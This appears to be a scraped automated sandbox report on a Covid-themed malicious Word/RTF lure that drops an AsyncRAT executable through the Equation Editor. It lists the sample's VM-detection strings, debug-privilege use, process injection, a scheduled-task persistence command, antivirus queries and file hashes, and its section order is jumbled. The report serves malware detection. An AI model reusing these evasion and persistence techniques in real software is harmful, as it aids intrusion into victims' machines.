Source: C:\Users\Public\69577.exe TID: 3020	Thread sleep count: 643 > 30	Jump to behavior

Source: C:\Users\Public\69577.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp	Binary or memory string: vmware
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools483m
Source: 69577.exe, 00000004.00000002.2114360333.00000000002E4000.00000004.00000001.sdmp	Binary or memory string: VMware_S
Source: 69577.exe, 00000004.00000002.2116590485.0000000005920000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 2m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: 3m"SOFTWARE\VMware, Inc.\VMware Tools
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\69577.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\69577.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\69577.exe

Memory written: C:\Users\Public\69577.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior

Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmp	Binary or memory string: Program ManagerHD3m
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmp	Binary or memory string: Program ManagerHD3m%
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: 69577.exe, 00000007.00000002.2353238180.00000000047CA000.00000004.00000001.sdmp	Binary or memory string: Message/Program Managerility Mode] - Microsoft Word Mode] - Micros
Source: 69577.exe, 00000007.00000002.2351851374.0000000000513000.00000004.00000020.sdmp	Binary or memory string: Program ManagerR

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\69577.exe	Queries volume information: C:\Users\Public\69577.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\69577.exe	Queries volume information: C:\Users\Public\69577.exe VolumeInformation			Jump to behavior

Source: C:\Users\Public\69577.exe

Code function: 4_2_00694B1C GetUserNameA,

4_2_00694B1C

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\Public\69577.exe

WMI Queries: IWbemServices::ExecQuery - Select * from AntivirusProduct

ID:	356233
Product:	CloudBasic
Start time:	19:51:43
Start date:	22.02.2021
Sample:	Deadly Variants of Covid 19.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	3d9171d094dae1fb8da244756dd9733c
SHA1:	91e43ec7a21e7e8c1fc2a6202ca3545974084ad2
SHA256:	4d1bde540b3c45739e1d8cff08e801ccb6ff9caad391109dc298b011a914e57c
Filetype:	Rich Text Format (5005/1) 55.56%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, 59134 bytes, 1 file	E92176B0889CC1BB97114BEB2F3C1728	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	4C263222F99F8CCD3BFF78D11287343A	EE20F124605FDE40B3F6CEE545E8D0D9D69F7538	6F6ECD80E49016ECD6284D61DF45B979CA2C27112B6E4E1FE0DD09260BE75D77
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DCCD2F6A61F8D95552863B537F2B6698	62C9D1B5C489133CBC0F19F3902724847BBFD765	3266A27BD3BB930017AA09BC7483AB2E047292B47F9D9C5796C02FA566D00CFE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2Me6ei3[1].htm	HTML document, ASCII text	88C573C24367B4A46F244961AB26A151	3A8C4FC70ACD33D906DA6F34169FF5554B0E82D4	1C33F2A85277E75A8BE212C6CBC947DC1AC6BDD9162132386A91FFE303314429
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AD9C643-349E-46EF-BF24-C3A751787722}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CA5B12C-492C-4E57-AE2D-0E7798ADDEF4}.tmp	data	7C382FAFE594F20C1C7308821CF166C4	8200943429016BB115C69F2E9E0F102E85CD44D8	45503DF30500D85200E4F8E266467C6B894940BF0A52D9FAC49CC88BE619A276
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5F6AD7-3C7C-4823-93B4-8E22DB7DEE25}.tmp	data	612870F14611A2846F34F3E170825E80	721433825DFB55328F6D5FE264C74AECDC016C16	A1BA57C7E4DB0AF82EA6DFA91F2DE55C40DAA9E5BC995CA4BDCFA3E9E8348A1D
C:\Users\user\AppData\Local\Temp\Cab7021.tmp	Microsoft Cabinet archive data, 59134 bytes, 1 file	E92176B0889CC1BB97114BEB2F3C1728	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
C:\Users\user\AppData\Local\Temp\Tar7022.tmp	data	64FEDADE4387A8B92C120B21EC61E394	15A2673209A41CCA2BC3ADE90537FE676010A962	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
C:\Users\user\AppData\Local\Temp\tmpA055.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	670E506D7A13CDF1A7EDA14E5533D0EE	670E6321EE31AC7BCC58B1EA48B82E8676FA30E0	4723B0312E0807A682EFC2672E778A957AF005EE722656F1A98227D816E7ECB4
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Deadly Variants of Covid 19.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Feb 23 02:52:35 2021, length=833197, window=hide	214DE48BB7AB3394487ED65A59720EE4	69906D7D7F6E81438464CDA474220ED1E80099DA	9C74F780B3A246C5F12CA814CADAE25408C6EA1C7836F23FD1E0D92B9835F740
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	F5B042E282283867959C5C4DC006A269	46AED4B701DD3CF1283F01E3284575073231499E	E0FFBF41794378ABE8041471D6044D8AAD0AF014C35005E2C9803DC4E1E4EBB0
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Little-endian UTF-16 Unicode text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WBLPQVYT.txt	ASCII text	FC0E959CB4BBA53D9D57ED91323DC910	EC318BF5B96F688BE0F48F6E765B59C6C380704D	203AC0200F37AEC3B1EF816C1FDC91CC78ABEF0417C8756D5D0CB0860826ECDB
C:\Users\user\AppData\Roaming\rLliXAh.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DCCD2F6A61F8D95552863B537F2B6698	62C9D1B5C489133CBC0F19F3902724847BBFD765	3266A27BD3BB930017AA09BC7483AB2E047292B47F9D9C5796C02FA566D00CFE
C:\Users\user\Desktop\~$adly Variants of Covid 19.doc	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\Public\69577.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DCCD2F6A61F8D95552863B537F2B6698	62C9D1B5C489133CBC0F19F3902724847BBFD765	3266A27BD3BB930017AA09BC7483AB2E047292B47F9D9C5796C02FA566D00CFE

Analysis Report Deadly Variants of Covid 19.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs